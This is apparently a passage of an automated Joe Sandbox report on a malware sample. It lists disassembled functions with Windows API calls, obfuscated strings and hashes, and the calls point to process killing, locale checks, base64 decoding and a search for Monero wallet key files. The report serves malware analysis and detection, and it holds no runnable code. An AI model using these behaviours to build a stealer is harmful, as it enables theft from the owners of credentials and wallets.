                                    • Instruction Fuzzy Hash: 79913372A142089BCF54FBB0ED969ED737EAF84300F00465CF90656585EE349B08CBEA
                                    Function 00ADDE9C Relevance: 12.8, Strings: 9, Instructions: 1513COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2132139185.000000000096A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                    • Associated: 00000000.00000002.2131924572.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000006AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000C06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132381993.0000000000C07000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132485547.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132499957.0000000000DA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_680000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: C:]$1ZWt$2um{$72Jv$Jl}u$Z}'y$m:{$g?y$s}
                                    • API String ID: 0-1974508172
                                    • Opcode ID: 99bde0ec7adf7c896b05245f573f7423d06ddafc4026c59ede11df5605a36900
                                    • Instruction ID: 4361e02e462bb51bd0f7d51e764c5ed39776dc665afa7ab724814610f57bd144
                                    • Opcode Fuzzy Hash: 99bde0ec7adf7c896b05245f573f7423d06ddafc4026c59ede11df5605a36900
                                    • Instruction Fuzzy Hash: 3BA216F360C2049FE7047E2DEC8567AFBE9EB94220F1A463DEAC5C3744E97598018697
                                    Function 00AD73CB Relevance: 12.8, Strings: 9, Instructions: 1512COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2132139185.000000000096A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                    • Associated: 00000000.00000002.2131924572.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000006AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000C06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132381993.0000000000C07000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132485547.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132499957.0000000000DA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_680000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: +RY{$/RY{$?WW$P^z$\<V~$b}^$uz|$vw$O_{
                                    • API String ID: 0-4230725404
                                    • Opcode ID: 9fcf9ae4e0cc157272786ad7ac179a6bdf5e1c46ab1ccd96890d96367e6131df
                                    • Instruction ID: 71e3e184351472c875e07f6fb73fe0e3df003532b570de311aff0deed0295a05
                                    • Opcode Fuzzy Hash: 9fcf9ae4e0cc157272786ad7ac179a6bdf5e1c46ab1ccd96890d96367e6131df
                                    • Instruction Fuzzy Hash: A0A236F3A0C3049FE3046E29EC8567ABBE5EF94720F164A3DE6C4C7744EA3598418697
                                    Function 006998E0 Relevance: 12.1, APIs: 8, Instructions: 55processCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00699905
                                    • Process32First.KERNEL32(00689FDE,00000128), ref: 00699919
                                    • Process32Next.KERNEL32(00689FDE,00000128), ref: 0069992E
                                    • StrCmpCA.SHLWAPI(?,00689FDE), ref: 00699943
                                    • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0069995C
                                    • TerminateProcess.KERNEL32(00000000,00000000), ref: 0069997A
                                    • CloseHandle.KERNEL32(00000000), ref: 00699987
                                    • CloseHandle.KERNEL32(00689FDE), ref: 00699993
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2131939068.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                    • Associated: 00000000.00000002.2131924572.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000006AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.000000000096A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000C06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132381993.0000000000C07000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132485547.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132499957.0000000000DA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_680000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CloseHandleProcessProcess32$CreateFirstNextOpenSnapshotTerminateToolhelp32
                                    • String ID:
                                    • API String ID: 2696918072-0
                                    • Opcode ID: be079070a534a6ec194205869907e7396393c63efb7df9f74969ac1a2677e4bc
                                    • Instruction ID: 8e01da9c768eab44249b8400143ef37e1e6520e3dcd171d9ee37bf4cd4fbecea
                                    • Opcode Fuzzy Hash: be079070a534a6ec194205869907e7396393c63efb7df9f74969ac1a2677e4bc
                                    • Instruction Fuzzy Hash: 0611EC75A18318ABDF24DFA6EC48BDDB7B9AB49701F00458CF509A6240DB749B84DFA0
                                    Function 00697D20 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0069AA50: lstrcpy.KERNEL32(006A0E1A,00000000), ref: 0069AA98
                                    • GetKeyboardLayoutList.USER32(00000000,00000000,006A05B7), ref: 00697D71
                                    • LocalAlloc.KERNEL32(00000040,?), ref: 00697D89
                                    • GetKeyboardLayoutList.USER32(?,00000000), ref: 00697D9D
                                    • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00697DF2
                                    • LocalFree.KERNEL32(00000000), ref: 00697EB2
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2131939068.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                    • Associated: 00000000.00000002.2131924572.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000006AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.000000000096A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000C06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132381993.0000000000C07000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132485547.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132499957.0000000000DA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_680000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                                    • String ID: /
                                    • API String ID: 3090951853-4001269591
                                    • Opcode ID: 9c9ebeb78fdc61fc61627f731e89a08bb34a21a252aee49d2314e71c4de74eef
                                    • Instruction ID: 2e4eff188c28de2ea07b79cee91e46efaed6fa924ad104f32295a2f3ddeb26d6
                                    • Opcode Fuzzy Hash: 9c9ebeb78fdc61fc61627f731e89a08bb34a21a252aee49d2314e71c4de74eef
                                    • Instruction Fuzzy Hash: A3417F71954218ABCF64DB94DC99BEEB3BAFF44700F1041D9E00A66680DB342F84CFA5
                                    Function 00AE1A03 Relevance: 9.8, Strings: 7, Instructions: 1053COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2132139185.000000000096A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                    • Associated: 00000000.00000002.2131924572.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000006AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000C06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132381993.0000000000C07000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132485547.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132499957.0000000000DA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_680000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: 'u?_$* {>$@v_$_4{_$op}$s7{_$r@W
                                    • API String ID: 0-880996861
                                    • Opcode ID: 94ddfdb7d2b3033fc2531dea5f3161298eb33e7433523a07823252a03383075b
                                    • Instruction ID: 7a4cbadad203409375e53832745b10c37525fc42bf9c2fb2f142599b5cd04282
                                    • Opcode Fuzzy Hash: 94ddfdb7d2b3033fc2531dea5f3161298eb33e7433523a07823252a03383075b
                                    • Instruction Fuzzy Hash: 6C62F8F3A0C2049FE3046E2DEC8577ABBE5EF94720F16463DEAC4D3744EA3558058696
                                    Function 0068E530 Relevance: 9.3, APIs: 4, Strings: 1, Instructions: 514fileCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0069AA50: lstrcpy.KERNEL32(006A0E1A,00000000), ref: 0069AA98
                                      • Part of subcall function 0069AC30: lstrcpy.KERNEL32(00000000,?), ref: 0069AC82
                                      • Part of subcall function 0069AC30: lstrcat.KERNEL32(00000000), ref: 0069AC92
                                      • Part of subcall function 0069ACC0: lstrlen.KERNEL32(?,01428E68,?,\Monero\wallet.keys,006A0E1A), ref: 0069ACD5
                                      • Part of subcall function 0069ACC0: lstrcpy.KERNEL32(00000000), ref: 0069AD14
                                      • Part of subcall function 0069ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0069AD22
                                      • Part of subcall function 0069ABB0: lstrcpy.KERNEL32(?,006A0E1A), ref: 0069AC15
                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,006A0D79), ref: 0068E5A2
                                    • StrCmpCA.SHLWAPI(?,006A15F0), ref: 0068E5F2
                                    • StrCmpCA.SHLWAPI(?,006A15F4), ref: 0068E608
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 0068ECDF
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2131939068.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                    • Associated: 00000000.00000002.2131924572.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000006AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.000000000096A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000C06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132381993.0000000000C07000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132485547.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132499957.0000000000DA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_680000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                                    • String ID: \*.*
                                    • API String ID: 433455689-1173974218
                                    • Opcode ID: 3b49c02ac1161e294d4c787e7b5075f6fdea566e53a3aa2ed9933210a42d54a9
                                    • Instruction ID: a41f6632950fdcec6183c0acd448ea02d5e22b0f2c0ed9cde5e4304baec75817
                                    • Opcode Fuzzy Hash: 3b49c02ac1161e294d4c787e7b5075f6fdea566e53a3aa2ed9933210a42d54a9
                                    • Instruction Fuzzy Hash: 88124E72A141189BCF54FBA0DCA6AED73BFAF54300F4045ACA50A56495EE306F48CFDA
                                    Function 00ADA86A Relevance: 9.1, Strings: 6, Instructions: 1639COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2132139185.000000000096A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                    • Associated: 00000000.00000002.2131924572.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000006AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000C06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132381993.0000000000C07000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132485547.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132499957.0000000000DA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_680000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: .4A@$6F~$=tm7$Bmy?$Kq~$^gxy
                                    • API String ID: 0-1048125708
                                    • Opcode ID: 8076367fa81f8bdedb7825ebb7905f9a0d81e59e5ba3a37091fcd2ca769e1bbf
                                    • Instruction ID: cb6d2bd434d5cda88dbe01d60406d2fc7068eb0c52b3cf21f706a9504b6b69cb
                                    • Opcode Fuzzy Hash: 8076367fa81f8bdedb7825ebb7905f9a0d81e59e5ba3a37091fcd2ca769e1bbf
                                    • Instruction Fuzzy Hash: 73B227F360C2009FE3046E2DEC85A7ABBE9EFD4720F16893DE6C4C7744EA7558058696
                                    Function 0068A210 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 55encryptionmemoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>Oh,00000000,00000000), ref: 0068A23F
                                    • LocalAlloc.KERNEL32(00000040,?,?,?,00684F3E,00000000,?), ref: 0068A251
                                    • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>Oh,00000000,00000000), ref: 0068A27A
                                    • LocalFree.KERNEL32(?,?,?,?,00684F3E,00000000,?), ref: 0068A28F
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2131939068.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                    • Associated: 00000000.00000002.2131924572.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000006AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.000000000096A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000C06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132381993.0000000000C07000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132485547.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132499957.0000000000DA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_680000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: BinaryCryptLocalString$AllocFree
                                    • String ID: >Oh
                                    • API String ID: 4291131564-3845958440
                                    • Opcode ID: 1172e715e4e4c757b6939924a1c13cdfafb5b677f260bb222a9746746a6bb387
                                    • Instruction ID: 682d262f4b535823a42538924c7ec67791b02d4311fc236d3104de2aae0f8847
                                    • Opcode Fuzzy Hash: 1172e715e4e4c757b6939924a1c13cdfafb5b677f260bb222a9746746a6bb387
                                    • Instruction Fuzzy Hash: 8411D774244308AFEB10CF94DC55FAA77B5EB48B11F208189FD159B390C772AA41CB50
                                    Function 006EF8D6 Relevance: 7.6, Strings: 6, Instructions: 123COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2131939068.00000000006AC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                    • Associated: 00000000.00000002.2131924572.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.000000000096A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000C06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132381993.0000000000C07000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132485547.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132499957.0000000000DA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_680000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: \u$\u${${$}$}
                                    • API String ID: 0-582841131
                                    • Opcode ID: 27d9cd0be1a73f01c92297f6708ad4a9299737c53231bb6b8c18bba91e257b74
                                    • Instruction ID: bb43e0e5e0276d1f6cbab9020a3f99350bebe9f36d99ca15250d0de1ccb9b88c
                                    • Opcode Fuzzy Hash: 27d9cd0be1a73f01c92297f6708ad4a9299737c53231bb6b8c18bba91e257b74
                                    • Instruction Fuzzy Hash: 12417C12E19BC9C6CB058B7944A02AEBFB22FD6210F6D42AAC4DD1F383C774414AD3A5
                                    Function 0068C920 Relevance: 7.6, APIs: 5, Instructions: 95stringencryptionCOMMON
                                    Download Yara Rule
                                    APIs
                                    • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 0068C971
                                    • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0068C97C
                                    • lstrcat.KERNEL32(?,006A0B47), ref: 0068CA43
                                    • lstrcat.KERNEL32(?,006A0B4B), ref: 0068CA57
                                    • lstrcat.KERNEL32(?,006A0B4E), ref: 0068CA78
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2131939068.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                    • Associated: 00000000.00000002.2131924572.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000006AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.000000000096A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000C06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132381993.0000000000C07000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132485547.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132499957.0000000000DA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_680000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$BinaryCryptStringlstrlen
                                    • String ID:
                                    • API String ID: 189259977-0
                                    • Opcode ID: d57e9c0f5a8350bdaee4e1c3a1947a0f4309456788fa626cf6e151b72b187c6e
                                    • Instruction ID: f32e5ffbbf1c855f50b0ff8cef732421479a9475cf2f5bfe58cb6092622003d1
                                    • Opcode Fuzzy Hash: d57e9c0f5a8350bdaee4e1c3a1947a0f4309456788fa626cf6e151b72b187c6e
                                    • Instruction Fuzzy Hash: 0B41607590820DEBDB10DFA4DD89BFEF7B9AB44305F1042A8E509A7280C7755B84DFA1
